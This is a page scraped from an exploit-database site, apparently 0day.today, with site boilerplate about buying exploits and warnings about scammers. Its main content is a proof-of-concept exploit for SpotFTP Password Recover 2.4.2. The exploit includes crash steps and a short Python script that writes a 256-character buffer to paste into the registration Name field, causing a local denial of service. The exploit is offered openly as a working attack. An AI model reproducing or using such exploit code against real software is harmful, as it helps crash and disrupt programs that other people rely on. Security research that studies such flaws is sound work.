0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SpotFTP Password Recover 2.4.2 - Name Denial of Service Exploit
# Exploit Title: SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) # Discovery by: Luis Martinez # Vendor Homepage: www.nsauditor.com # Software Link : http://www.nsauditor.com/downloads/spotftp_setup.exe # Tested Version: 2.4.2 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code : python SpotFTP_Password_Recover_2.4.2.py # 2.- Open SpotFTP_Password_Recover_2.4.2.txt and copy content to clipboard # 3.- Open SpotFTP # 4.- Register -> Enter Registration Code... # 5.- Paste ClipBoard on "Name:" # 6.- Key: -> L4M5 # 7.- OK # 8.- Crashed #!/usr/bin/env python buffer = "\x41" * 256 f = open ("SpotFTP_Password_Recover_2.4.2.txt", "w") f.write(buffer) f.close() # 0day.today [2024-11-16] #